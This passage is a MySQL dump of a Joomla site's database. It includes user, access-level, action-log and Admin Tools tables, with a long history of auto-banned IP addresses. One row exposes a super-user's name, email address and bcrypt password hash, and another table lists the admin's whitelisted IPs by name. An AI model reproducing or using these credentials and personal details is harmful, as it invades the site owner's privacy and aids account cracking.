`otpKey` varchar(1000) NOT NULL DEFAULT '' COMMENT 'Two factor authentication encrypted keys',
`otep` varchar(1000) NOT NULL DEFAULT '' COMMENT 'One time emergency passwords',
`requireReset` tinyint(4) NOT NULL DEFAULT 0 COMMENT 'Require user to reset password on next login',
PRIMARY KEY (`id`),
KEY `idx_name` (`name`),
KEY `idx_block` (`block`),
KEY `username` (`username`),
KEY `email` (`email`)
) ENGINE=InnoDB AUTO_INCREMENT=693 DEFAULT CHARSET=utf8 COLLATE=utf8_general_ci;
/*!40101 SET character_set_client = @saved_cs_client */;
--
-- Dumping data for table `atlyh_users`
--
LOCK TABLES `atlyh_users` WRITE;
/*!40000 ALTER TABLE `atlyh_users` DISABLE KEYS */;
INSERT INTO `atlyh_users` VALUES (692,'Super User','crashtackle','bevan@webspring.co.za','$2y$10$NXoiiCp60ovJZhCAR3OHF.CGw3zE770mvjydJsmaPENOdF0BQWOMW',0,1,'2015-10-25 07:12:59','2016-03-08 12:53:04','0','','0000-00-00 00:00:00',0,'','',0);
/*!40000 ALTER TABLE `atlyh_users` ENABLE KEYS */;
UNLOCK TABLES;
--
-- Table structure for table `atlyh_viewlevels`
--
DROP TABLE IF EXISTS `atlyh_viewlevels`;
/*!40101 SET @saved_cs_client = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `atlyh_viewlevels` (
`id` int(10) unsigned NOT NULL AUTO_INCREMENT COMMENT 'Primary Key',
`title` varchar(100) NOT NULL DEFAULT '',
`ordering` int(11) NOT NULL DEFAULT 0,
`rules` varchar(5120) NOT NULL COMMENT 'JSON encoded access control.',
PRIMARY KEY (`id`),
UNIQUE KEY `idx_assetgroup_title_lookup` (`title`)
) ENGINE=InnoDB AUTO_INCREMENT=7 DEFAULT CHARSET=utf8 COLLATE=utf8_general_ci;
/*!40101 SET character_set_client = @saved_cs_client */;
--
-- Dumping data for table `atlyh_viewlevels`
--
LOCK TABLES `atlyh_viewlevels` WRITE;
/*!40000 ALTER TABLE `atlyh_viewlevels` DISABLE KEYS */;
INSERT INTO `atlyh_viewlevels` VALUES (1,'Public',0,'[1]'),(2,'Registered',1,'[6,2,8]'),(3,'Special',2,'[6,3,8]'),(5,'Guest',0,'[9]'),(6,'Super Users',0,'[8]');
/*!40000 ALTER TABLE `atlyh_viewlevels` ENABLE KEYS */;
UNLOCK TABLES;
--
-- Table structure for table `vzx9b_action_log_config`
--
DROP TABLE IF EXISTS `vzx9b_action_log_config`;
/*!40101 SET @saved_cs_client = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `vzx9b_action_log_config` (
`id` int(10) unsigned NOT NULL AUTO_INCREMENT,
`type_title` varchar(255) NOT NULL DEFAULT '',
`type_alias` varchar(255) NOT NULL DEFAULT '',
`id_holder` varchar(255) DEFAULT NULL,
`title_holder` varchar(255) DEFAULT NULL,
`table_name` varchar(255) DEFAULT NULL,
`text_prefix` varchar(255) DEFAULT NULL,
PRIMARY KEY (`id`)
) ENGINE=InnoDB AUTO_INCREMENT=20 DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_unicode_ci;
/*!40101 SET character_set_client = @saved_cs_client */;
--
-- Dumping data for table `vzx9b_action_log_config`
--
LOCK TABLES `vzx9b_action_log_config` WRITE;
/*!40000 ALTER TABLE `vzx9b_action_log_config` DISABLE KEYS */;
INSERT INTO `vzx9b_action_log_config` VALUES (1,'article','com_content.article','id','title','#__content','PLG_ACTIONLOG_JOOMLA'),(2,'article','com_content.form','id','title','#__content','PLG_ACTIONLOG_JOOMLA'),(3,'banner','com_banners.banner','id','name','#__banners','PLG_ACTIONLOG_JOOMLA'),(4,'user_note','com_users.note','id','subject','#__user_notes','PLG_ACTIONLOG_JOOMLA'),(5,'media','com_media.file','','name','','PLG_ACTIONLOG_JOOMLA'),(6,'category','com_categories.category','id','title','#__categories','PLG_ACTIONLOG_JOOMLA'),(7,'menu','com_menus.menu','id','title','#__menu_types','PLG_ACTIONLOG_JOOMLA'),(8,'menu_item','com_menus.item','id','title','#__menu','PLG_ACTIONLOG_JOOMLA'),(9,'newsfeed','com_newsfeeds.newsfeed','id','name','#__newsfeeds','PLG_ACTIONLOG_JOOMLA'),(10,'link','com_redirect.link','id','old_url','#__redirect_links','PLG_ACTIONLOG_JOOMLA'),(11,'tag','com_tags.tag','id','title','#__tags','PLG_ACTIONLOG_JOOMLA'),(12,'style','com_templates.style','id','title','#__template_styles','PLG_ACTIONLOG_JOOMLA'),(13,'plugin','com_plugins.plugin','extension_id','name','#__extensions','PLG_ACTIONLOG_JOOMLA'),(14,'component_config','com_config.component','extension_id','name','','PLG_ACTIONLOG_JOOMLA'),(15,'contact','com_contact.contact','id','name','#__contact_details','PLG_ACTIONLOG_JOOMLA'),(16,'module','com_modules.module','id','title','#__modules','PLG_ACTIONLOG_JOOMLA'),(17,'access_level','com_users.level','id','title','#__viewlevels','PLG_ACTIONLOG_JOOMLA'),(18,'banner_client','com_banners.client','id','name','#__banner_clients','PLG_ACTIONLOG_JOOMLA'),(19,'application_config','com_config.application','','name','','PLG_ACTIONLOG_JOOMLA');
/*!40000 ALTER TABLE `vzx9b_action_log_config` ENABLE KEYS */;
UNLOCK TABLES;
--
-- Table structure for table `vzx9b_action_logs`
--
DROP TABLE IF EXISTS `vzx9b_action_logs`;
/*!40101 SET @saved_cs_client = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `vzx9b_action_logs` (
`id` int(10) unsigned NOT NULL AUTO_INCREMENT,
`message_language_key` varchar(255) NOT NULL DEFAULT '',
`message` text NOT NULL,
`log_date` datetime NOT NULL DEFAULT '0000-00-00 00:00:00',
`extension` varchar(50) NOT NULL DEFAULT '',
`user_id` int(11) NOT NULL DEFAULT 0,
`item_id` int(11) NOT NULL DEFAULT 0,
`ip_address` varchar(40) NOT NULL DEFAULT '0.0.0.0',
PRIMARY KEY (`id`),
KEY `idx_user_id` (`user_id`),
KEY `idx_user_id_logdate` (`user_id`,`log_date`),
KEY `idx_user_id_extension` (`user_id`,`extension`),
KEY `idx_extension_item_id` (`extension`,`item_id`)
) ENGINE=InnoDB DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_unicode_ci;
/*!40101 SET character_set_client = @saved_cs_client */;
--
-- Dumping data for table `vzx9b_action_logs`
--
LOCK TABLES `vzx9b_action_logs` WRITE;
/*!40000 ALTER TABLE `vzx9b_action_logs` DISABLE KEYS */;
/*!40000 ALTER TABLE `vzx9b_action_logs` ENABLE KEYS */;
UNLOCK TABLES;
--
-- Table structure for table `vzx9b_action_logs_extensions`
--
DROP TABLE IF EXISTS `vzx9b_action_logs_extensions`;
/*!40101 SET @saved_cs_client = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `vzx9b_action_logs_extensions` (
`id` int(10) unsigned NOT NULL AUTO_INCREMENT,
`extension` varchar(255) NOT NULL DEFAULT '',
PRIMARY KEY (`id`)
) ENGINE=InnoDB AUTO_INCREMENT=19 DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_unicode_ci;
/*!40101 SET character_set_client = @saved_cs_client */;
--
-- Dumping data for table `vzx9b_action_logs_extensions`
--
LOCK TABLES `vzx9b_action_logs_extensions` WRITE;
/*!40000 ALTER TABLE `vzx9b_action_logs_extensions` DISABLE KEYS */;
INSERT INTO `vzx9b_action_logs_extensions` VALUES (1,'com_banners'),(2,'com_cache'),(3,'com_categories'),(4,'com_config'),(5,'com_contact'),(6,'com_content'),(7,'com_installer'),(8,'com_media'),(9,'com_menus'),(10,'com_messages'),(11,'com_modules'),(12,'com_newsfeeds'),(13,'com_plugins'),(14,'com_redirect'),(15,'com_tags'),(16,'com_templates'),(17,'com_users'),(18,'com_checkin');
/*!40000 ALTER TABLE `vzx9b_action_logs_extensions` ENABLE KEYS */;
UNLOCK TABLES;
--
-- Table structure for table `vzx9b_action_logs_users`
--
DROP TABLE IF EXISTS `vzx9b_action_logs_users`;
/*!40101 SET @saved_cs_client = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `vzx9b_action_logs_users` (
`user_id` int(11) unsigned NOT NULL,
`notify` tinyint(1) unsigned NOT NULL,
`extensions` text NOT NULL,
PRIMARY KEY (`user_id`),
KEY `idx_notify` (`notify`)
) ENGINE=InnoDB DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_unicode_ci;
/*!40101 SET character_set_client = @saved_cs_client */;
--
-- Dumping data for table `vzx9b_action_logs_users`
--
LOCK TABLES `vzx9b_action_logs_users` WRITE;
/*!40000 ALTER TABLE `vzx9b_action_logs_users` DISABLE KEYS */;
/*!40000 ALTER TABLE `vzx9b_action_logs_users` ENABLE KEYS */;
UNLOCK TABLES;
--
-- Table structure for table `vzx9b_admintools_acl`
--
DROP TABLE IF EXISTS `vzx9b_admintools_acl`;
/*!40101 SET @saved_cs_client = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `vzx9b_admintools_acl` (
`user_id` bigint(20) unsigned NOT NULL,
`permissions` longtext DEFAULT NULL,
PRIMARY KEY (`user_id`)
) ENGINE=InnoDB DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_unicode_ci;
/*!40101 SET character_set_client = @saved_cs_client */;
--
-- Dumping data for table `vzx9b_admintools_acl`
--
LOCK TABLES `vzx9b_admintools_acl` WRITE;
/*!40000 ALTER TABLE `vzx9b_admintools_acl` DISABLE KEYS */;
/*!40000 ALTER TABLE `vzx9b_admintools_acl` ENABLE KEYS */;
UNLOCK TABLES;
--
-- Table structure for table `vzx9b_admintools_adminiplist`
--
DROP TABLE IF EXISTS `vzx9b_admintools_adminiplist`;
/*!40101 SET @saved_cs_client = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `vzx9b_admintools_adminiplist` (
`id` bigint(20) unsigned NOT NULL AUTO_INCREMENT,
`ip` varchar(255) DEFAULT NULL,
`description` varchar(255) DEFAULT NULL,
UNIQUE KEY `id` (`id`)
) ENGINE=InnoDB AUTO_INCREMENT=3 DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_unicode_ci;
/*!40101 SET character_set_client = @saved_cs_client */;
--
-- Dumping data for table `vzx9b_admintools_adminiplist`
--
LOCK TABLES `vzx9b_admintools_adminiplist` WRITE;
/*!40000 ALTER TABLE `vzx9b_admintools_adminiplist` DISABLE KEYS */;
INSERT INTO `vzx9b_admintools_adminiplist` VALUES (1,'169.0.59.215','Bevan iMac'),(2,'169.0.59.143','Bevan iMac');
/*!40000 ALTER TABLE `vzx9b_admintools_adminiplist` ENABLE KEYS */;
UNLOCK TABLES;
--
-- Table structure for table `vzx9b_admintools_badwords`
--
DROP TABLE IF EXISTS `vzx9b_admintools_badwords`;
/*!40101 SET @saved_cs_client = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `vzx9b_admintools_badwords` (
`id` bigint(20) unsigned NOT NULL AUTO_INCREMENT,
`word` varchar(255) DEFAULT NULL,
UNIQUE KEY `id` (`id`)
) ENGINE=InnoDB DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_unicode_ci;
/*!40101 SET character_set_client = @saved_cs_client */;
--
-- Dumping data for table `vzx9b_admintools_badwords`
--
LOCK TABLES `vzx9b_admintools_badwords` WRITE;
/*!40000 ALTER TABLE `vzx9b_admintools_badwords` DISABLE KEYS */;
/*!40000 ALTER TABLE `vzx9b_admintools_badwords` ENABLE KEYS */;
UNLOCK TABLES;
--
-- Table structure for table `vzx9b_admintools_cookies`
--
DROP TABLE IF EXISTS `vzx9b_admintools_cookies`;
/*!40101 SET @saved_cs_client = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `vzx9b_admintools_cookies` (
`series` varchar(255) NOT NULL,
`client_hash` varchar(255) NOT NULL,
`valid_to` datetime NOT NULL DEFAULT '0000-00-00 00:00:00',
PRIMARY KEY (`series`(100))
) ENGINE=InnoDB DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_unicode_ci;
/*!40101 SET character_set_client = @saved_cs_client */;
--
-- Dumping data for table `vzx9b_admintools_cookies`
--
LOCK TABLES `vzx9b_admintools_cookies` WRITE;
/*!40000 ALTER TABLE `vzx9b_admintools_cookies` DISABLE KEYS */;
/*!40000 ALTER TABLE `vzx9b_admintools_cookies` ENABLE KEYS */;
UNLOCK TABLES;
--
-- Table structure for table `vzx9b_admintools_customperms`
--
DROP TABLE IF EXISTS `vzx9b_admintools_customperms`;
/*!40101 SET @saved_cs_client = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `vzx9b_admintools_customperms` (
`id` bigint(20) unsigned NOT NULL AUTO_INCREMENT,
`path` varchar(255) NOT NULL,
`perms` varchar(4) DEFAULT '0644',
UNIQUE KEY `id` (`id`),
KEY `vzx9b_admintools_customperms_path` (`path`(100))
) ENGINE=InnoDB DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_unicode_ci;
/*!40101 SET character_set_client = @saved_cs_client */;
--
-- Dumping data for table `vzx9b_admintools_customperms`
--
LOCK TABLES `vzx9b_admintools_customperms` WRITE;
/*!40000 ALTER TABLE `vzx9b_admintools_customperms` DISABLE KEYS */;
/*!40000 ALTER TABLE `vzx9b_admintools_customperms` ENABLE KEYS */;
UNLOCK TABLES;
--
-- Table structure for table `vzx9b_admintools_filescache`
--
DROP TABLE IF EXISTS `vzx9b_admintools_filescache`;
/*!40101 SET @saved_cs_client = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `vzx9b_admintools_filescache` (
`admintools_filescache_id` bigint(20) NOT NULL AUTO_INCREMENT,
`path` varchar(2048) NOT NULL,
`filedate` int(11) NOT NULL DEFAULT 0,
`filesize` int(11) NOT NULL DEFAULT 0,
`data` blob DEFAULT NULL,
`checksum` varchar(32) NOT NULL DEFAULT '',
PRIMARY KEY (`admintools_filescache_id`)
) ENGINE=InnoDB DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_unicode_ci;
/*!40101 SET character_set_client = @saved_cs_client */;
--
-- Dumping data for table `vzx9b_admintools_filescache`
--
LOCK TABLES `vzx9b_admintools_filescache` WRITE;
/*!40000 ALTER TABLE `vzx9b_admintools_filescache` DISABLE KEYS */;
/*!40000 ALTER TABLE `vzx9b_admintools_filescache` ENABLE KEYS */;
UNLOCK TABLES;
--
-- Table structure for table `vzx9b_admintools_ipautoban`
--
DROP TABLE IF EXISTS `vzx9b_admintools_ipautoban`;
/*!40101 SET @saved_cs_client = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `vzx9b_admintools_ipautoban` (
`ip` varchar(255) NOT NULL,
`reason` varchar(255) DEFAULT 'other',
`until` datetime DEFAULT NULL,
UNIQUE KEY `vzx9b_admintools_ipautoban_ip` (`ip`(100))
) ENGINE=InnoDB DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_unicode_ci;
/*!40101 SET character_set_client = @saved_cs_client */;
--
-- Dumping data for table `vzx9b_admintools_ipautoban`
--
LOCK TABLES `vzx9b_admintools_ipautoban` WRITE;
/*!40000 ALTER TABLE `vzx9b_admintools_ipautoban` DISABLE KEYS */;
INSERT INTO `vzx9b_admintools_ipautoban` VALUES ('20.14.79.172','adminpw','2022-09-20 23:52:23');
/*!40000 ALTER TABLE `vzx9b_admintools_ipautoban` ENABLE KEYS */;
UNLOCK TABLES;
--
-- Table structure for table `vzx9b_admintools_ipautobanhistory`
--
DROP TABLE IF EXISTS `vzx9b_admintools_ipautobanhistory`;
/*!40101 SET @saved_cs_client = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `vzx9b_admintools_ipautobanhistory` (
`id` bigint(20) unsigned NOT NULL AUTO_INCREMENT,
`ip` varchar(255) NOT NULL,
`reason` varchar(255) DEFAULT 'other',
`until` datetime DEFAULT NULL,
PRIMARY KEY (`id`)
) ENGINE=InnoDB AUTO_INCREMENT=956 DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_unicode_ci;
/*!40101 SET character_set_client = @saved_cs_client */;
--
-- Dumping data for table `vzx9b_admintools_ipautobanhistory`
--
LOCK TABLES `vzx9b_admintools_ipautobanhistory` WRITE;
/*!40000 ALTER TABLE `vzx9b_admintools_ipautobanhistory` DISABLE KEYS */;
INSERT INTO `vzx9b_admintools_ipautobanhistory` VALUES (1,'169.1.174.71','adminpw','2017-01-11 14:26:10'),(2,'188.165.220.19','wafblacklist','2017-02-09 11:24:13'),(3,'37.9.169.24','wafblacklist','2017-02-12 20:58:26'),(4,'37.187.24.87','wafblacklist','2017-03-29 05:20:17'),(5,'199.217.115.217','wafblacklist','2017-04-05 11:38:40'),(6,'50.62.177.215','wafblacklist','2017-04-06 17:34:02'),(7,'169.0.110.242','ipwl','2017-05-23 12:52:14'),(8,'169.1.89.183','ipwl','2017-05-26 09:08:14'),(9,'169.1.89.183','ipwl','2017-05-26 09:08:14'),(10,'162.214.14.216','wafblacklist','2017-06-03 08:16:39'),(11,'169.0.59.143','ipwl','2017-06-05 08:38:53'),(12,'77.69.203.53','adminpw','2018-04-27 12:21:45'),(13,'217.17.249.9','adminpw','2018-05-05 10:11:06'),(14,'130.0.233.119','404shield','2018-05-31 08:12:11'),(15,'141.196.192.57','404shield','2018-06-01 10:09:44'),(16,'5.188.136.72','404shield','2018-06-02 04:30:39'),(17,'5.188.136.72','404shield','2018-06-02 04:30:39'),(18,'178.137.85.118','404shield','2018-06-03 07:22:52'),(19,'178.137.85.118','404shield','2018-06-20 10:19:26'),(20,'115.89.123.121','404shield','2018-06-21 23:44:36'),(21,'115.89.123.121','404shield','2018-06-21 23:44:36'),(22,'178.137.85.118','404shield','2018-07-12 15:19:38'),(23,'212.83.149.171','adminpw','2018-08-29 20:28:00'),(24,'178.137.94.57','404shield','2018-09-07 18:17:34'),(25,'118.184.47.13','404shield','2018-09-15 06:50:39'),(26,'103.213.244.20','404shield','2018-10-21 02:49:07'),(27,'103.213.244.20','404shield','2018-10-21 02:49:07'),(28,'103.213.244.20','404shield','2018-10-26 14:50:47'),(29,'94.23.196.14','404shield','2018-11-05 23:09:29'),(30,'94.23.196.14','404shield','2018-11-06 05:14:09'),(31,'192.99.35.63','404shield','2018-11-12 19:53:32'),(32,'192.99.0.107','404shield','2019-01-31 01:12:19'),(33,'178.137.19.88','404shield','2018-10-27 13:33:05'),(34,'94.23.2.209','404shield','2018-11-12 00:35:23'),(36,'178.175.143.156','404shield','2019-02-27 17:10:08'),(37,'87.118.110.27','404shield','2019-02-27 22:21:56'),(38,'5.196.1.129','404shield','2019-02-27 22:22:49'),(39,'178.175.132.211','404shield','2019-02-28 04:24:35'),(40,'54.39.148.234','404shield','2019-02-28 04:25:05'),(41,'51.15.56.18','404shield','2019-02-28 04:26:34'),(42,'178.175.132.225','404shield','2019-02-28 09:01:57'),(43,'209.141.37.237','404shield','2019-02-28 09:14:09'),(44,'162.247.74.199','404shield','2019-02-28 09:16:17'),(45,'128.1.34.12','404shield','2019-04-06 03:10:10'),(46,'128.14.224.41','404shield','2019-03-28 01:05:14'),(47,'134.249.48.131','404shield','2019-03-29 16:32:13'),(49,'128.1.34.12','404shield','2019-04-06 11:40:23'),(50,'158.69.247.45','404shield','2019-04-24 09:17:13'),(51,'192.185.146.8','404shield','2019-05-07 15:41:08'),(52,'158.69.247.45','404shield','2019-05-07 15:40:54'),(53,'176.8.91.27','404shield','2019-05-07 19:41:08'),(54,'192.185.146.8','404shield','2019-05-08 09:58:37'),(55,'192.99.0.107','404shield','2019-05-08 09:58:29'),(56,'192.185.146.8','404shield','2019-05-08 18:28:54'),(57,'46.105.127.166','404shield','2019-05-08 18:28:41'),(58,'192.185.146.8','404shield','2019-05-10 16:30:26'),(59,'46.105.127.166','404shield','2019-05-10 16:29:56'),(60,'46.105.99.212','404shield','2019-05-10 19:40:22'),(61,'46.105.127.166','404shield','2019-05-12 15:12:30'),(62,'153.232.166.207','404shield','2019-05-12 16:47:13'),(63,'68.183.97.251','404shield','2019-05-14 21:44:06'),(64,'204.191.85.34','404shield','2019-05-16 15:12:50'),(65,'157.230.10.36','404shield','2019-05-16 22:19:43'),(66,'114.113.222.226','404shield','2019-05-18 11:36:13'),(67,'101.251.215.232','404shield','2019-05-19 18:51:27'),(68,'51.38.186.234','404shield','2019-05-20 06:10:10'),(69,'1.20.97.216','404shield','2019-05-20 20:25:39'),(70,'119.98.215.192','404shield','2019-05-20 20:28:45'),(71,'149.202.62.72','404shield','2019-05-24 09:13:47'),(72,'41.66.219.16','404shield','2019-06-07 01:30:36'),(77,'195.154.183.53','404shield','2019-06-12 13:33:40'),(78,'41.66.246.35','404shield','2019-07-04 16:35:05'),(79,'83.166.240.162','404shield','2019-07-17 20:12:16'),(80,'193.110.107.210','404shield','2019-07-18 12:45:14'),(81,'213.87.157.144','404shield','2019-07-23 10:08:10'),(83,'192.99.35.149','404shield','2019-08-05 18:09:50'),(84,'46.105.99.212','404shield','2019-08-06 15:45:53'),(85,'77.120.176.171','404shield','2019-11-02 03:47:02'),(86,'77.120.176.171','404shield','2019-11-03 14:42:13'),(87,'77.120.176.171','404shield','2019-11-05 12:35:42'),(88,'43.231.77.236','adminpw','2019-08-06 00:48:19'),(89,'103.250.157.38','404shield','2019-09-22 17:41:30'),(90,'116.58.226.245','404shield','2019-11-01 17:15:03'),(91,'116.50.169.189','404shield','2019-11-01 21:25:05'),(95,'82.78.189.130','muashield','2019-11-10 23:14:49'),(96,'77.120.176.171','404shield','2019-11-10 04:01:14'),(97,'198.71.240.36','adminpw','2019-11-07 22:55:24'),(98,'190.214.30.146','404shield','2019-11-22 16:04:14'),(99,'157.245.197.92','404shield','2019-11-24 20:01:24'),(100,'118.96.56.158','404shield','2019-11-24 20:20:51'),(101,'118.174.205.222','404shield','2019-11-27 06:55:40'),(102,'124.122.161.5','404shield','2019-11-27 06:57:27'),(103,'154.73.129.124','404shield','2019-12-08 14:58:22'),(104,'169.255.234.166','404shield','2019-12-16 11:36:33'),(105,'202.93.113.9','404shield','2019-12-18 08:23:07'),(106,'180.254.29.53','404shield','2019-12-18 08:30:04'),(107,'94.200.195.218','404shield','2020-01-04 08:33:50'),(108,'155.138.235.98','404shield','2020-01-04 08:45:29'),(109,'188.166.161.208','404shield','2020-01-04 09:24:11'),(110,'82.78.189.130','muashield','2020-01-06 10:46:25'),(111,'75.73.50.82','404shield','2020-01-12 20:57:06'),(112,'175.41.139.245','404shield','2020-01-16 01:24:23'),(113,'103.74.117.89','404shield','2020-01-16 01:25:31'),(114,'27.147.210.35','404shield','2020-01-16 03:08:58'),(115,'67.75.2.39','404shield','2020-01-16 14:01:47'),(116,'104.248.91.205','404shield','2020-01-17 04:53:28'),(117,'80.80.109.85','404shield','2020-03-18 15:06:08'),(118,'79.174.38.172','404shield','2020-04-04 10:41:56'),(119,'37.79.244.168','404shield','2020-06-05 00:06:49'),(121,'68.183.203.160','404shield','2020-06-20 09:18:35'),(122,'181.31.217.87','adminpw','2020-06-30 18:44:15'),(123,'1.9.141.180','404shield','2020-07-04 08:37:12'),(125,'70.37.85.81','adminpw','2020-07-10 17:54:48'),(126,'70.37.85.81','adminpw','2020-07-11 12:27:00'),(127,'37.79.244.168','404shield','2020-07-12 03:20:57'),(129,'70.113.86.177','adminpw','2020-07-18 18:06:19'),(130,'89.36.224.5','adminpw','2020-08-08 10:38:09'),(131,'45.86.203.192','adminpw','2020-08-08 13:21:12'),(132,'217.160.28.161','404shield','2020-08-24 09:02:39'),(133,'51.81.98.68','404shield','2020-08-28 00:54:09'),(134,'161.35.127.172','404shield','2020-08-29 02:39:57'),(135,'51.81.98.68','404shield','2020-08-29 18:39:17'),(136,'94.130.107.178','404shield','2020-08-30 00:39:31'),(137,'161.35.127.172','404shield','2020-08-29 20:07:57'),(138,'94.130.107.178','404shield','2020-08-30 01:31:09'),(140,'52.249.182.14','404shield','2020-08-31 04:23:15'),(141,'157.230.126.145','404shield','2020-09-01 11:23:45'),(142,'91.121.183.9','404shield','2020-09-05 05:13:09'),(143,'40.115.158.144','404shield','2020-09-05 06:32:28'),(144,'52.188.2.186','404shield','2020-09-13 22:51:13'),(145,'157.55.192.39','404shield','2020-09-14 00:07:06'),(146,'193.239.147.35','404shield','2020-09-15 04:08:57'),(148,'217.160.60.249','adminpw','2020-09-19 00:39:03'),(149,'217.69.8.152','404shield','2020-09-19 22:59:23'),(150,'13.90.25.234','404shield','2020-09-27 22:36:00'),(151,'193.239.147.35','404shield','2020-09-28 16:39:39'),(152,'13.90.25.234','404shield','2020-09-30 07:16:41'),(153,'13.90.25.234','404shield','2020-10-03 19:08:56'),(154,'193.239.147.59','404shield','2020-10-07 09:05:47'),(155,'193.239.147.59','404shield','2020-10-07 12:28:05'),(156,'14.192.248.5','404shield','2020-10-13 16:27:01'),(157,'78.4.54.14','404shield','2020-10-14 19:41:46'),(158,'87.95.133.197','404shield','2020-10-14 22:21:48'),(159,'91.190.180.62','404shield','2020-10-15 08:38:31'),(160,'146.66.19.18','404shield','2020-10-15 10:16:07'),(163,'91.121.183.89','404shield','2020-10-15 17:17:55'),(164,'188.244.26.193','404shield','2020-10-15 19:22:14'),(166,'193.239.147.178','adminpw','2020-10-15 22:27:20'),(167,'193.239.147.178','adminpw','2020-10-16 00:35:03'),(168,'77.235.107.64','404shield','2020-10-16 19:51:04'),(169,'193.239.147.178','sessionshield','2020-10-16 13:00:33'),(170,'95.153.97.220','404shield','2020-10-16 14:03:18'),(171,'37.23.223.239','404shield','2020-10-18 00:37:32'),(172,'185.152.123.171','404shield','2020-10-18 08:56:55'),(173,'77.235.107.64','404shield','2020-10-18 19:25:20'),(174,'77.235.100.180','404shield','2020-10-19 03:45:02'),(175,'91.219.58.18','404shield','2020-10-20 07:08:54'),(176,'95.153.88.85','404shield','2020-10-20 14:24:15'),(177,'5.62.41.171','404shield','2020-10-20 16:40:42'),(178,'82.127.135.212','404shield','2020-10-21 20:57:11'),(179,'20.185.16.146','404shield','2020-10-22 02:14:00'),(180,'37.204.108.240','404shield','2020-10-23 00:47:01'),(181,'176.113.227.121','404shield','2020-10-24 12:41:21'),(182,'37.232.186.185','404shield','2020-10-25 07:49:19'),(183,'14.161.20.205','404shield','2020-10-27 15:05:36'),(184,'202.169.110.145','404shield','2020-10-27 18:19:53'),(185,'115.84.92.92','404shield','2020-10-27 19:33:51'),(186,'51.195.201.76','404shield','2020-10-29 16:12:17'),(187,'95.153.81.158','404shield','2020-10-30 18:18:25'),(188,'89.218.172.166','404shield','2020-10-30 23:58:41'),(189,'187.188.132.83','404shield','2020-10-31 00:20:10'),(190,'45.147.197.216','dfishield','2020-11-02 03:32:30'),(191,'95.153.88.85','404shield','2020-11-02 20:04:56'),(192,'186.179.100.134','404shield','2020-11-04 12:49:26'),(193,'193.239.147.186','404shield','2020-11-05 03:23:08'),(194,'14.161.20.205','404shield','2020-11-05 05:04:56'),(195,'193.239.147.186','404shield','2020-11-05 06:54:31'),(196,'31.36.100.205','404shield','2020-11-05 23:54:04'),(197,'113.161.88.235','404shield','2020-11-06 10:28:20'),(198,'104.210.214.37','404shield','2020-11-07 01:41:57'),(199,'202.137.155.95','404shield','2020-11-08 17:11:57'),(200,'115.84.92.239','404shield','2020-11-09 00:34:29'),(201,'104.210.214.37','404shield','2020-11-10 00:25:20'),(202,'202.137.155.142','404shield','2020-11-12 02:43:49'),(203,'2.119.45.57','404shield','2020-11-12 07:22:39'),(204,'194.184.98.141','404shield','2020-11-12 22:49:21'),(205,'31.211.67.220','404shield','2020-11-13 01:52:28'),(206,'112.175.232.147','404shield','2020-11-13 09:50:10'),(207,'103.1.93.165','404shield','2020-11-13 18:50:09'),(208,'202.137.155.212','404shield','2020-11-14 01:46:38'),(209,'45.147.197.216','dfishield','2020-11-14 23:14:52'),(210,'104.210.214.37','404shield','2020-11-15 00:55:05'),(211,'115.84.91.38','404shield','2020-11-15 13:39:20'),(212,'91.122.198.128','404shield','2020-11-17 09:31:43'),(213,'31.36.100.205','404shield','2020-11-21 14:18:10'),(214,'104.43.245.228','adminpw','2020-11-21 23:36:31'),(215,'104.43.245.228','adminpw','2020-11-22 01:34:36'),(216,'185.239.242.228','404shield','2020-11-22 13:46:24'),(217,'115.84.99.72','404shield','2020-11-24 11:18:48'),(218,'185.239.242.228','404shield','2020-11-24 19:42:13'),(219,'2.119.45.57','404shield','2020-11-24 21:29:04'),(220,'202.137.155.68','404shield','2020-11-24 21:52:43'),(222,'115.84.92.243','404shield','2020-11-25 02:45:55'),(223,'185.239.242.228','404shield','2020-11-25 05:28:29'),(224,'159.242.227.26','404shield','2020-11-25 08:49:46'),(225,'159.242.227.26','adminpw','2020-11-25 11:53:15'),(226,'95.153.112.39','404shield','2020-11-27 11:52:56'),(227,'176.113.228.24','404shield','2020-11-28 08:33:42'),(228,'129.213.138.117','404shield','2020-11-28 17:25:44'),(229,'187.190.227.120','404shield','2020-11-29 08:56:50'),(230,'186.46.40.142','404shield','2020-12-05 11:21:39'),(231,'194.184.98.141','404shield','2020-12-06 02:14:51'),(232,'95.54.73.214','404shield','2020-12-07 17:24:19'),(233,'18.232.61.117','sessionshield','2020-12-08 23:10:57'),(234,'2.119.45.57','404shield','2020-12-12 19:14:07'),(235,'77.220.48.162','404shield','2020-12-14 02:28:22'),(236,'193.254.37.110','404shield','2020-12-14 07:22:02'),(237,'186.46.40.142','404shield','2020-12-14 14:13:58'),(238,'202.137.155.142','404shield','2020-12-14 15:37:55'),(239,'115.84.92.92','404shield','2020-12-14 21:20:21'),(240,'92.100.159.218','404shield','2020-12-15 08:18:53'),(241,'178.159.37.134','dfishield','2020-12-15 